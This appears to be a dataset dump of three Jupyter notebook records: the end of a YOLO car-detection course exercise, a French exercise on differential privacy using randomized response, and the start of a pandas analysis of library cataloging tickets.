"____________________________________________________________________________________________________\nLayer (type) Output Shape Param # Connected to \n====================================================================================================\ninput_1 (InputLayer) (None, 608, 608, 3) 0 \n____________________________________________________________________________________________________\nconv2d_1 (Conv2D) (None, 608, 608, 32) 864 input_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_1 (BatchNorm (None, 608, 608, 32) 128 conv2d_1[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_1 (LeakyReLU) (None, 608, 608, 32) 0 batch_normalization_1[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_1 (MaxPooling2D) (None, 304, 304, 32) 0 leaky_re_lu_1[0][0] \n____________________________________________________________________________________________________\nconv2d_2 (Conv2D) (None, 304, 304, 64) 18432 max_pooling2d_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_2 (BatchNorm (None, 304, 304, 64) 256 conv2d_2[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_2 (LeakyReLU) (None, 304, 304, 64) 0 batch_normalization_2[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_2 (MaxPooling2D) (None, 152, 152, 64) 0 leaky_re_lu_2[0][0] \n____________________________________________________________________________________________________\nconv2d_3 (Conv2D) (None, 152, 152, 128) 73728 max_pooling2d_2[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_3 (BatchNorm (None, 152, 152, 128) 512 conv2d_3[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_3 (LeakyReLU) (None, 152, 152, 128) 0 batch_normalization_3[0][0] \n____________________________________________________________________________________________________\nconv2d_4 (Conv2D) (None, 152, 152, 64) 8192 leaky_re_lu_3[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_4 (BatchNorm (None, 152, 152, 64) 256 conv2d_4[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_4 (LeakyReLU) (None, 152, 152, 64) 0 batch_normalization_4[0][0] \n____________________________________________________________________________________________________\nconv2d_5 (Conv2D) (None, 152, 152, 128) 73728 leaky_re_lu_4[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_5 (BatchNorm (None, 152, 152, 128) 512 conv2d_5[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_5 (LeakyReLU) (None, 152, 152, 128) 0 batch_normalization_5[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_3 (MaxPooling2D) (None, 76, 76, 128) 0 leaky_re_lu_5[0][0] 
\n____________________________________________________________________________________________________\nconv2d_6 (Conv2D) (None, 76, 76, 256) 294912 max_pooling2d_3[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_6 (BatchNorm (None, 76, 76, 256) 1024 conv2d_6[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_6 (LeakyReLU) (None, 76, 76, 256) 0 batch_normalization_6[0][0] \n____________________________________________________________________________________________________\nconv2d_7 (Conv2D) (None, 76, 76, 128) 32768 leaky_re_lu_6[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_7 (BatchNorm (None, 76, 76, 128) 512 conv2d_7[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_7 (LeakyReLU) (None, 76, 76, 128) 0 batch_normalization_7[0][0] \n____________________________________________________________________________________________________\nconv2d_8 (Conv2D) (None, 76, 76, 256) 294912 leaky_re_lu_7[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_8 (BatchNorm (None, 76, 76, 256) 1024 conv2d_8[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_8 (LeakyReLU) (None, 76, 76, 256) 0 batch_normalization_8[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_4 (MaxPooling2D) (None, 38, 38, 256) 0 leaky_re_lu_8[0][0] \n____________________________________________________________________________________________________\nconv2d_9 (Conv2D) (None, 38, 38, 512) 1179648 max_pooling2d_4[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_9 (BatchNorm (None, 38, 38, 512) 2048 conv2d_9[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_9 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_9[0][0] \n____________________________________________________________________________________________________\nconv2d_10 (Conv2D) (None, 38, 38, 256) 131072 leaky_re_lu_9[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_10 (BatchNor (None, 38, 38, 256) 1024 conv2d_10[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_10 (LeakyReLU) (None, 38, 38, 256) 0 batch_normalization_10[0][0] \n____________________________________________________________________________________________________\nconv2d_11 (Conv2D) (None, 38, 38, 512) 1179648 leaky_re_lu_10[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_11 (BatchNor (None, 38, 38, 512) 2048 conv2d_11[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_11 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_11[0][0] \n____________________________________________________________________________________________________\nconv2d_12 (Conv2D) (None, 38, 38, 256) 131072 leaky_re_lu_11[0][0] 
\n____________________________________________________________________________________________________\nbatch_normalization_12 (BatchNor (None, 38, 38, 256) 1024 conv2d_12[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_12 (LeakyReLU) (None, 38, 38, 256) 0 batch_normalization_12[0][0] \n____________________________________________________________________________________________________\nconv2d_13 (Conv2D) (None, 38, 38, 512) 1179648 leaky_re_lu_12[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_13 (BatchNor (None, 38, 38, 512) 2048 conv2d_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_13 (LeakyReLU) (None, 38, 38, 512) 0 batch_normalization_13[0][0] \n____________________________________________________________________________________________________\nmax_pooling2d_5 (MaxPooling2D) (None, 19, 19, 512) 0 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nconv2d_14 (Conv2D) (None, 19, 19, 1024) 4718592 max_pooling2d_5[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_14 (BatchNor (None, 19, 19, 1024) 4096 conv2d_14[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_14 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_14[0][0] \n____________________________________________________________________________________________________\nconv2d_15 (Conv2D) (None, 19, 19, 512) 524288 leaky_re_lu_14[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_15 (BatchNor (None, 19, 19, 512) 2048 conv2d_15[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_15 (LeakyReLU) (None, 19, 19, 512) 0 batch_normalization_15[0][0] \n____________________________________________________________________________________________________\nconv2d_16 (Conv2D) (None, 19, 19, 1024) 4718592 leaky_re_lu_15[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_16 (BatchNor (None, 19, 19, 1024) 4096 conv2d_16[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_16 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_16[0][0] \n____________________________________________________________________________________________________\nconv2d_17 (Conv2D) (None, 19, 19, 512) 524288 leaky_re_lu_16[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_17 (BatchNor (None, 19, 19, 512) 2048 conv2d_17[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_17 (LeakyReLU) (None, 19, 19, 512) 0 batch_normalization_17[0][0] \n____________________________________________________________________________________________________\nconv2d_18 (Conv2D) (None, 19, 19, 1024) 4718592 leaky_re_lu_17[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_18 (BatchNor (None, 19, 19, 1024) 4096 conv2d_18[0][0] 
\n____________________________________________________________________________________________________\nleaky_re_lu_18 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_18[0][0] \n____________________________________________________________________________________________________\nconv2d_19 (Conv2D) (None, 19, 19, 1024) 9437184 leaky_re_lu_18[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_19 (BatchNor (None, 19, 19, 1024) 4096 conv2d_19[0][0] \n____________________________________________________________________________________________________\nconv2d_21 (Conv2D) (None, 38, 38, 64) 32768 leaky_re_lu_13[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_19 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_19[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_21 (BatchNor (None, 38, 38, 64) 256 conv2d_21[0][0] \n____________________________________________________________________________________________________\nconv2d_20 (Conv2D) (None, 19, 19, 1024) 9437184 leaky_re_lu_19[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_21 (LeakyReLU) (None, 38, 38, 64) 0 batch_normalization_21[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_20 (BatchNor (None, 19, 19, 1024) 4096 conv2d_20[0][0] \n____________________________________________________________________________________________________\nspace_to_depth_x2 (Lambda) (None, 19, 19, 256) 0 leaky_re_lu_21[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_20 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_20[0][0] \n____________________________________________________________________________________________________\nconcatenate_1 (Concatenate) (None, 19, 19, 1280) 0 space_to_depth_x2[0][0] \n leaky_re_lu_20[0][0] \n____________________________________________________________________________________________________\nconv2d_22 (Conv2D) (None, 19, 19, 1024) 11796480 concatenate_1[0][0] \n____________________________________________________________________________________________________\nbatch_normalization_22 (BatchNor (None, 19, 19, 1024) 4096 conv2d_22[0][0] \n____________________________________________________________________________________________________\nleaky_re_lu_22 (LeakyReLU) (None, 19, 19, 1024) 0 batch_normalization_22[0][0] \n____________________________________________________________________________________________________\nconv2d_23 (Conv2D) (None, 19, 19, 425) 435625 leaky_re_lu_22[0][0] \n====================================================================================================\nTotal params: 50,983,561\nTrainable params: 50,962,889\nNon-trainable params: 20,672\n____________________________________________________________________________________________________\n"
]
],
[
[
"**Note**: On some computers, you may see a warning message from Keras. Don't worry about it if you do--it is fine.\n\n**Reminder**: this model converts a preprocessed batch of input images (shape: (m, 608, 608, 3)) into a tensor of shape (m, 19, 19, 5, 85) as explained in Figure (2).",
"_____no_output_____"
],
[
"### 3.3 - Convert output of the model to usable bounding box tensors\n\nThe output of `yolo_model` is a (m, 19, 19, 5, 85) tensor that needs to pass through non-trivial processing and conversion. The following cell does that for you.\n\nIf you are curious about how `yolo_head` is implemented, you can find the function definition in the file ['keras_yolo.py'](https://github.com/allanzelener/YAD2K/blob/master/yad2k/models/keras_yolo.py). The file is located in your workspace in this path 'yad2k/models/keras_yolo.py'.",
"_____no_output_____"
]
],
[
[
"yolo_outputs = yolo_head(yolo_model.output, anchors, len(class_names))",
"_____no_output_____"
]
],
[
[
"You added `yolo_outputs` to your graph. This set of 4 tensors is ready to be used as input by your `yolo_eval` function.",
"_____no_output_____"
],
[
"### 3.4 - Filtering boxes\n\n`yolo_outputs` gave you all the predicted boxes of `yolo_model` in the correct format. You're now ready to perform filtering and select only the best boxes. Let's now call `yolo_eval`, which you had previously implemented, to do this. ",
"_____no_output_____"
]
],
[
[
"scores, boxes, classes = yolo_eval(yolo_outputs, image_shape)",
"_____no_output_____"
]
],
[
[
"### 3.5 - Run the graph on an image\n\nLet the fun begin. You have created a graph that can be summarized as follows:\n\n1. <font color='purple'> yolo_model.input </font> is given to `yolo_model`. The model is used to compute the output <font color='purple'> yolo_model.output </font>\n2. <font color='purple'> yolo_model.output </font> is processed by `yolo_head`. It gives you <font color='purple'> yolo_outputs </font>\n3. <font color='purple'> yolo_outputs </font> goes through a filtering function, `yolo_eval`. It outputs your predictions: <font color='purple'> scores, boxes, classes </font>\n\n**Exercise**: Implement predict() which runs the graph to test YOLO on an image.\nYou will need to run a TensorFlow session, to have it compute `scores, boxes, classes`.\n\nThe code below also uses the following function:\n```python\nimage, image_data = preprocess_image(\"images/\" + image_file, model_image_size = (608, 608))\n```\nwhich outputs:\n- image: a python (PIL) representation of your image used for drawing boxes. You won't need to use it.\n- image_data: a numpy-array representing the image. This will be the input to the CNN.\n\n**Important note**: when a model uses BatchNorm (as is the case in YOLO), you will need to pass an additional placeholder in the feed_dict {K.learning_phase(): 0}.\n\n#### Hint: Using the TensorFlow Session object\n* Recall that above, we called `K.get_Session()` and saved the Session object in `sess`.\n* To evaluate a list of tensors, we call `sess.run()` like this:\n```\nsess.run(fetches=[tensor1,tensor2,tensor3],\n feed_dict={yolo_model.input: the_input_variable,\n K.learning_phase():0\n }\n```\n* Notice that the variables `scores, boxes, classes` are not passed into the `predict` function, but these are global variables that you will use within the `predict` function.",
"_____no_output_____"
]
],
[
[
"def predict(sess, image_file):\n \"\"\"\n Runs the graph stored in \"sess\" to predict boxes for \"image_file\". Prints and plots the predictions.\n \n Arguments:\n sess -- your tensorflow/Keras session containing the YOLO graph\n image_file -- name of an image stored in the \"images\" folder.\n \n Returns:\n out_scores -- tensor of shape (None, ), scores of the predicted boxes\n out_boxes -- tensor of shape (None, 4), coordinates of the predicted boxes\n out_classes -- tensor of shape (None, ), class index of the predicted boxes\n \n Note: \"None\" actually represents the number of predicted boxes, it varies between 0 and max_boxes. \n \"\"\"\n\n # Preprocess your image\n image, image_data = preprocess_image(\"images/\" + image_file, model_image_size = (608, 608))\n\n # Run the session with the correct tensors and choose the correct placeholders in the feed_dict.\n # You'll need to use feed_dict={yolo_model.input: ... , K.learning_phase(): 0})\n ### START CODE HERE ### (≈ 1 line)\n out_scores, out_boxes, out_classes = sess.run([scores, boxes, classes], feed_dict={yolo_model.input: image_data,\n K.learning_phase(): 0})\n ### END CODE HERE ###\n\n # Print predictions info\n print('Found {} boxes for {}'.format(len(out_boxes), image_file))\n # Generate colors for drawing bounding boxes.\n colors = generate_colors(class_names)\n # Draw bounding boxes on the image file\n draw_boxes(image, out_scores, out_boxes, out_classes, class_names, colors)\n # Save the predicted bounding box on the image\n image.save(os.path.join(\"out\", image_file), quality=90)\n # Display the results in the notebook\n output_image = scipy.misc.imread(os.path.join(\"out\", image_file))\n imshow(output_image)\n \n return out_scores, out_boxes, out_classes",
"_____no_output_____"
]
],
[
[
"Run the following cell on the \"test.jpg\" image to verify that your function is correct.",
"_____no_output_____"
]
],
[
[
"out_scores, out_boxes, out_classes = predict(sess, \"test.jpg\")",
"Found 7 boxes for test.jpg\ncar 0.60 (925, 285) (1045, 374)\ncar 0.66 (706, 279) (786, 350)\nbus 0.67 (5, 266) (220, 407)\ncar 0.70 (947, 324) (1280, 705)\ncar 0.74 (159, 303) (346, 440)\ncar 0.80 (761, 282) (942, 412)\ncar 0.89 (367, 300) (745, 648)\n"
]
],
[
[
"**Expected Output**:\n\n<table>\n <tr>\n <td>\n **Found 7 boxes for test.jpg**\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.60 (925, 285) (1045, 374)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.66 (706, 279) (786, 350)\n </td>\n </tr>\n <tr>\n <td>\n **bus**\n </td>\n <td>\n 0.67 (5, 266) (220, 407)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.70 (947, 324) (1280, 705)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.74 (159, 303) (346, 440)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.80 (761, 282) (942, 412)\n </td>\n </tr>\n <tr>\n <td>\n **car**\n </td>\n <td>\n 0.89 (367, 300) (745, 648)\n </td>\n </tr>\n</table>",
"_____no_output_____"
],
[
"The model you've just run is actually able to detect 80 different classes listed in \"coco_classes.txt\". To test the model on your own images:\n 1. Click on \"File\" in the upper bar of this notebook, then click \"Open\" to go on your Coursera Hub.\n 2. Add your image to this Jupyter Notebook's directory, in the \"images\" folder\n 3. Write your image's name in the cell above code\n 4. Run the code and see the output of the algorithm!\n\nIf you were to run your session in a for loop over all your images. Here's what you would get:\n\n<center>\n<video width=\"400\" height=\"200\" src=\"nb_images/pred_video_compressed2.mp4\" type=\"video/mp4\" controls>\n</video>\n</center>\n\n<caption><center> Predictions of the YOLO model on pictures taken from a camera while driving around the Silicon Valley <br> Thanks [drive.ai](https://www.drive.ai/) for providing this dataset! </center></caption>",
"_____no_output_____"
],
[
"\n## <font color='darkblue'>What you should remember:\n \n- YOLO is a state-of-the-art object detection model that is fast and accurate\n- It runs an input image through a CNN which outputs a 19x19x5x85 dimensional volume. \n- The encoding can be seen as a grid where each of the 19x19 cells contains information about 5 boxes.\n- You filter through all the boxes using non-max suppression. Specifically: \n - Score thresholding on the probability of detecting a class to keep only accurate (high probability) boxes\n - Intersection over Union (IoU) thresholding to eliminate overlapping boxes\n- Because training a YOLO model from randomly initialized weights is non-trivial and requires a large dataset as well as lot of computation, we used previously trained model parameters in this exercise. If you wish, you can also try fine-tuning the YOLO model with your own dataset, though this would be a fairly non-trivial exercise. ",
"_____no_output_____"
],
[
"**References**: The ideas presented in this notebook came primarily from the two YOLO papers. The implementation here also took significant inspiration and used many components from Allan Zelener's GitHub repository. The pre-trained weights used in this exercise came from the official YOLO website. \n- Joseph Redmon, Santosh Divvala, Ross Girshick, Ali Farhadi - [You Only Look Once: Unified, Real-Time Object Detection](https://arxiv.org/abs/1506.02640) (2015)\n- Joseph Redmon, Ali Farhadi - [YOLO9000: Better, Faster, Stronger](https://arxiv.org/abs/1612.08242) (2016)\n- Allan Zelener - [YAD2K: Yet Another Darknet 2 Keras](https://github.com/allanzelener/YAD2K)\n- The official YOLO website (https://pjreddie.com/darknet/yolo/) ",
"_____no_output_____"
],
[
"**Car detection dataset**:\n<a rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\"><img alt=\"Creative Commons License\" style=\"border-width:0\" src=\"https://i.creativecommons.org/l/by/4.0/88x31.png\" /></a><br /><span xmlns:dct=\"http://purl.org/dc/terms/\" property=\"dct:title\">The Drive.ai Sample Dataset</span> (provided by drive.ai) is licensed under a <a rel=\"license\" href=\"http://creativecommons.org/licenses/by/4.0/\">Creative Commons Attribution 4.0 International License</a>. We are grateful to Brody Huval, Chih Hu and Rahul Patel for providing this data. ",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
]
] |
cb51c2a9f6c77f230233803970161a322c86c817 | 7,383 | ipynb | Jupyter Notebook | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | Jour-2/Serie-1/jour_2_serie_1_exo_2.ipynb | c4dt/cours_gyminf_sec_2104 | 378e76951081da68eb792c9b035486227d3d260f | [
"CC0-1.0"
] | null | null | null | 31.823276 | 214 | 0.599621 | [
[
[
"# Exercice 2\n\nCe deuxième exercice va se produire dans une partie `code` où vous devez écrire quelques lignes de Python! Mais pas de soucis, on va y aller progressivement.\nEn-dessous de ce block de texte vous trouverez trois blocks pour les trois niveaux de l'exercice.\n\nOn va se pencher sur la *Differential Privacy* et faire quelques exercices dessus.\n\n## 1. Connaissance\n\nDans la première partie vous trouvez une petite fonction qui prend comme entrée si vous êtes un délinquant, et qui sort une réponse protégée par la *Differential Privacy*.\nsi vous faites tourner le code, il vous donnera quelques réponses pour des entrées différentes.\n\nVous pouvez faire tourner le block plusieurs fois, et il devrait vous afficher des résultats différents presque chaque fois.",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 1\nimport random\n\n# Returns True or False for a coin toss. The random.choice method chooses randombly between\n# the two values. Think of \"True\" as \"Tail\", and \"False\" as \"Head\"\ndef coin() -> bool:\n return random.choice([True, False])\n\n# Differential Privacy 1 - takes a vairable as input that indicates if the real value is guilty or\n# not. Then it uses DP to decide whether it should output the real value, or a made-up guiltyness.\ndef dp_1(guilty: bool) -> bool:\n if coin():\n return guilty\n else:\n return coin()\n\n# A pretty-printing method that shows nicely what is going on.\ndef print_guilty(guilty: bool) -> str:\n if guilty:\n print(\"Is guilty\")\n else:\n print(\"Is innocent\")\n \n# Two outputs for a guilty and an innocent person:\nprint_guilty(dp_1(True))\nprint_guilty(dp_1(False))",
"_____no_output_____"
]
],
[
[
"## 2. Compréhension\n\n### Générateurs aléatoire\n\nPourquoi en lançant le block plusieurs fois vous recevez des résultats différents *presque* chaque fois?\n\n### Espérance mathématique\n\nOn va essayer de trouver l'espérance mathématique de notre function dépendant si on est innocent ou pas. Au lieu de le faire mathémeatiquement, on va le faire par essai et contage, et un peu de bon sens...\n\nDans le block `Exercice 2 - Partie 2`, ajoutez 10 fois la ligne suivante:\n\n print_guilty(dp_1(True))\n\npuis lancez le block.\n\n- Combien de fois vous trouvez `guilty`, combien de fois `innocent`?\n\n- Quelle est donc l'espérance mathématique si on met `guilty` à `1`, et `innocent` à `0`?\n\n- La même question, mais si on met `print_guilty(dp_1(False))`\n\n### Correction de la DP\n\n- Supposons qu'on a seulement une personne qui est coupable - combien de coupables va-t-on trouver en moyenne?\n\n- En connaissant l'espérence mathématique de `dp_1(False)`, comment on peut calculer la valeur probable de personnes coupables?",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 2",
"_____no_output_____"
]
],
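[
[
"If you prefer not to paste the line 10 times by hand, here is one possible way to estimate the expected values empirically. This is only a suggestion, and it assumes that the cell defining `dp_1` above has already been run:\n\n```python\n# Empirical estimate of the expected value of dp_1 (guilty = 1, innocent = 0),\n# assuming dp_1 from the cell above is available.\ntrials = 10000\navg_guilty = sum(dp_1(True) for _ in range(trials)) / trials\navg_innocent = sum(dp_1(False) for _ in range(trials)) / trials\nprint(f'average answer for a guilty person: {avg_guilty:.2f}')\nprint(f'average answer for an innocent person: {avg_innocent:.2f}')\n```",
"_____no_output_____"
]
],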
[
[
"## 3. Application\n\nSi vous connaissez un peu la programmation, alors on peut faire les calculs un peu plus correcte.\n\n### Créer un nombre élevé de mesures\n\nLa première méthode `create_measures` va remplacer notre utilisation ligne par ligne d'appel à `dp_1`.\nLe paramètre `p_guilty` indique la probabilité entre 0 et 1 qu'un élément est coupable.\n\n### Calculer le nombre de personnes coupables\n\nLa deuxième méthode `calculate_guilty` prend la sortie de `create_measures` pour calculer le nombre\nprobable de personnes coupables.\nIl faudra d'abord compter le nombre de `True` dans l'entré, puis le mettre en relation avec le nombre\ntotal de réponses.\nAprès il faut corriger par rapport à l'érreur introduite par la DP.",
"_____no_output_____"
]
],
[
[
"# Exercice 2 - Partie 3\n\n# This method returns a number of throws where each throw is randomly chosen to be\n# from a guilty person with probability p_guilty.\n# The return value should be an array of booleans.\ndef create_measures(throws: int, p_guilty: float) -> [bool]:\n pass\n\n# Returns the most probable number of guilty persons given the array of results.\ndef calculate_guilty(results: [bool]) -> float:\n pass\n\n# This should print a number close to 0.1 * 100 = 10 guilty persons.\nprint(f'The number of guilty persons are: {calculate_guilty(create_measures(100, 0.1))}')",
"_____no_output_____"
]
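,
[
"For reference, here is one possible solution sketch for the two methods above; try to solve the exercise yourself before looking at it. It assumes the cells defining `random` and `dp_1` have been run, and it corrects for the DP noise using the expected values found in part 2 (a truly guilty person answers True with probability 0.75, an innocent one with probability 0.25):\n\n```python\n# One possible solution sketch (assumes random and dp_1 from the cells above).\n\ndef create_measures(throws: int, p_guilty: float) -> [bool]:\n    # Each throw simulates one person: guilty with probability p_guilty,\n    # whose answer then goes through the differentially private dp_1.\n    return [dp_1(random.random() < p_guilty) for _ in range(throws)]\n\ndef calculate_guilty(results: [bool]) -> float:\n    # Observed fraction of True answers.\n    f = sum(results) / len(results)\n    # P(True) = 0.75 * p + 0.25 * (1 - p) = 0.25 + 0.5 * p, hence p = 2 * f - 0.5.\n    p = 2 * f - 0.5\n    return p * len(results)\n\nprint(f'The number of guilty persons is: {calculate_guilty(create_measures(100, 0.1))}')\n```",
"_____no_output_____"
]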
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb51c4e1701ce3363f1bb8da0fabbf5fdc05a3a9 | 13,119 | ipynb | Jupyter Notebook | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | notebooks/action_plan_data.ipynb | BookOps-CAT/tickets-analysis | 7fca7367e8e789fac0950b1e5a4a272e749f0512 | [
"MIT"
] | null | null | null | 25.132184 | 153 | 0.475112 | [
[
[
"import pandas as pd\nfh = '../files/tickets-gen-all.csv'\ndf = pd.read_csv(fh, index_col=0, parse_dates=['created', 'opened_at', 'updated_on', 'resolved'])\ndf.shape",
"_____no_output_____"
],
[
"df.columns",
"_____no_output_____"
]
],
[
[
"##### cataloging active tickets only",
"_____no_output_____"
]
],
[
[
"cadf = df[((df['category'] == 'Cataloging') | (df['assignment_group'] == 'BKOPS CAT')) & ((df['state'] != 'Closed') & (df['state'] != 'Resolved'))]",
"_____no_output_____"
]
],
[
[
"## Cataloging tickets requiring category change (diff dept)",
"_____no_output_____"
]
],
[
[
"df['category'].unique()",
"_____no_output_____"
],
[
"df['assignment_group'].unique()",
"_____no_output_____"
],
[
"cat_change_df = df[(df['category'] == 'Cataloging') & ((df['assignment_group'] != 'BKOPS CAT') & (df['assignment_group'].notnull()))]",
"_____no_output_____"
],
[
"cat_change_df.shape[0]",
"_____no_output_____"
],
[
"cat_change_df_active = cat_change_df[(cat_change_df['state'] != 'Closed') & (cat_change_df['state'] != 'Resolved')]",
"_____no_output_____"
],
[
"print(f'# of tickets: {cat_change_df_active.shape[0]}')",
"# of tickets: 34\n"
]
],
[
[
"## Awaiting User & Vendor tickets",
"_____no_output_____"
]
],
[
[
"awaiting_df = cadf[((cadf['state'] == 'Awaiting Vendor') | (cadf['state'] == 'Awaiting User Info')) & (cadf['created'] < '2020-01-01')]",
"_____no_output_____"
],
[
"awaiting_df['state'].unique()",
"_____no_output_____"
],
[
"print(f'# of tickets: {awaiting_df.shape[0]}')",
"# of tickets: 748\n"
]
],
[
[
"### NEW tickets backlog (older than mid February 2020)",
"_____no_output_____"
]
],
[
[
"new_backlog_df = cadf[(cadf['state'] == 'New') & (cadf['assigned_to'].isnull())]",
"_____no_output_____"
],
[
"new_backlog_df.shape[0]",
"_____no_output_____"
],
[
"for lib, ldf in new_backlog_df.groupby('system'):\n print(lib, f'# of tickets: {ldf.shape[0]}')",
"BPL Circulating # of tickets: 193\nNYPL Circulating # of tickets: 147\nNYPL Research # of tickets: 44\n"
]
],
[
[
"## Active CAT tickets",
"_____no_output_____"
]
],
[
[
"years = [2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020]\n\ncaadf = cadf[cadf['state'] == 'Active']\n\nfor lib, ldf in caadf.groupby('system'):\n staff_df = pd.DataFrame(columns=['staff', 'year', 'tickets'])\n for staff, sdf in ldf.groupby('assigned_to'):\n d = dict()\n for y, ydf in sdf.groupby(sdf['created'].map(lambda x: x.year)):\n d[y]={'staff': staff, 'year': y, 'tickets': ydf.shape[0]}\n for y in years:\n if y in d.keys():\n staff_df = staff_df.append(d[y], ignore_index=True)\n else:\n staff_df = staff_df.append({'staff': staff, 'year': y, 'tickets': 0}, ignore_index=True)\n \n staff_df.to_csv(f'../data-display/{lib}-active-tickets-by-staff.csv', index=False)\n ",
"_____no_output_____"
]
],
[
[
"#### active by library per year",
"_____no_output_____"
]
],
[
[
"lib_out_df = pd.DataFrame(columns=['library', 'year', 'tickets'])\nfor lib, ldf in caadf.groupby('system'):\n d = dict()\n for y, ydf in ldf.groupby(ldf['created'].map(lambda x: x.year)):\n d[y]={'library': lib, 'year': y, 'tickets': ydf.shape[0]}\n for y in years:\n if y in d.keys():\n lib_out_df = lib_out_df.append(d[y], ignore_index=True)\n else:\n lib_out_df = lib_out_df.append({'library': lib, 'year': y, 'tickets': 0}, ignore_index=True)\nlib_out_df.to_csv('../data-display/cat-active-tickets-per-lib-timeline.csv', index=False)",
"_____no_output_____"
]
],
[
[
"#### Active categories",
"_____no_output_____"
]
],
[
[
"cat_out_df = pd.DataFrame(columns=['subcategory', 'tickets'])\nfor cat, cdf in caadf.groupby('subcategory'):\n print(cat, cdf.shape[0])\n cat_out_df = cat_out_df.append(\n dict(\n subcategory=cat,\n tickets=cdf.shape[0]\n ),\n ignore_index=True\n )\ncat_out_df.head()",
